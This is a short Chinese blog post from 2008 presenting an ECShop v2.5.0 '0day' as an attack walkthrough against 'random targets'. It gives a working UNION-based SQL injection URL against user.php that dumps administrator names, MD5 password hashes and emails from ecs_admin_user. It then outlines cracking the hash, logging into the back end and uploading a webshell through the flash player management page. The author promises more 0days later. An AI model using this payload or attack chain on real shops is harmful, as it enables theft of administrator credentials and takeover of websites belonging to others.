查看文章
 
ECShop v2.5.0 0day
2008/10/25 下午 7:41

漏洞来源:网络
PS:以后定期更新些高手放出来的0day。

ECShop v2.5.0
系统存在着注入漏洞,通过它我们可以获得后台权限。
随机目标
图1:



网站首页后跟代码
user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
爆出管理员ID、MD5密码散列、E信箱
图2:

破解密码:
图3:



登陆后台界面,来到flash播放器管理界面上传网马
图4:



获得权限
图5:


类别:原创文章||添加到搜藏 |分享到i贴吧|浏览(1512)|评论 (0)
 
最近读者:
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
     

   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu